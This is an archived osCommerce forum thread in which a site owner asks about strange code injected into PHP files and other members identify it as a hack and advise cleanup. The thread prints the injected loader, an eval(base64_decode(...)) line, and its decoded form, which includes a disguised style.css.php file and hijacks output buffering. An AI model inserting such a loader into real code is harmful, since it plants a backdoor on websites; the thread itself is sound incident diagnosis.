Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

What is this strange code?


xprt007

Recommended Posts

Hi

 

I noticed some strange code I dont rfemember seeing before at the top of some files I opened, including applicatio_top.php & column_right.php.

 

Here is a sample:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2FmcmlxdWUxL3B1YmxpY19odG1sL2RydXBhbC9zaXRlcy9kZWZhdWx0L21vZHVsZXMvaW1hZ2UvY29udHJpYi9pbWFnZV9nYWxsZXJ5L3ZpZXdzL3RoZW1lL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

 

Is it normal & if not, would it mean the site was hacked?

 

Thanks in advance & regards.

Link to comment
Share on other sites

I noticed some strange code I dont rfemember seeing before at the top of some files I opened, including applicatio_top.php & column_right.php.

 

Is it normal & if not, would it mean the site was hacked?

 

You have been hacked. Her is the code:

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/afrique1/public_html/drupal/sites/default/modules/image/contrib/image_gallery/views/theme/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Link to comment
Share on other sites

Thanks for your very informative responses.

 

That is no good news as it means practically spending lots of hours of extra work on a site that was going to be handed over to a client.

Is this just bad luck to have been hacked at this time or Oscommerce is that vulnerable?

If this particular vulnerability is known, why are there no better defenses or the suggested measures above not applied to the code?

Anyway, I don't know Oscommerce enough to criticize it. I'm more at home with Drupal CMS & there such issues are handled differently.

 

Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected. >_< :blink: :'(

If I have more questions ...

 

Once again, thanks & regards :thumbsup:

Link to comment
Share on other sites

Since all php files, including those outside Oscommerce in other folders have been infected, I think I will begin by deleting everything. I have Drupal CMS in another folder which has also been infected. pinch.gifblink.gifcrying.gif

If I have more questions ...

 

Once again, thanks & regards thumbsup.gif

 

You can also try this contribution: osCommerce VTS

It's an Virus & Threat Scanner for osCommerce that can help you find infected files if you want to..

Link to comment
Share on other sites

You can also try this contribution: osCommerce VTS

It's an Virus & Threat Scanner for osCommerce that can help you find infected files if you want to..

 

Hi

I am on shared server. As I see in the readme file, the script works there as well.

Apart from scanning, what does it do? Can it delete the located bad files? In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced. How would this help me at this stage? I'm sure it is worth having AFTER the clean up.

 

Thanks & regards

Link to comment
Share on other sites

Hi

I am on shared server. As I see in the readme file, the script works there as well.

Apart from scanning, what does it do? Can it delete the located bad files? In my case, it seems all the thousands of Oscommerce & those in other folders with complete scripts/sites, such as the mentioned Drupal site have apparently already been infected & have to be cleaned or deleted & replaced. How would this help me at this stage? I'm sure it is worth having AFTER the clean up.

 

Thanks & regards

 

It does nothing more than scan and report possible threats in your files. You have to manually erase files or code from files.

If hundreds or thousands of files are infected, then erase your whole site and reinstall from earlier backups.

If you dont have up to date backups it could be worth trying this contribution..

Link to comment
Share on other sites

I have another question:

Is the database also infected by this code? rolleyes.gif

In that case, I would just delete the files, upload new oscommerce files ...

 

Normally it is not. The code you showed us does not alter the database.

You should do a scan and see if there is more..

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...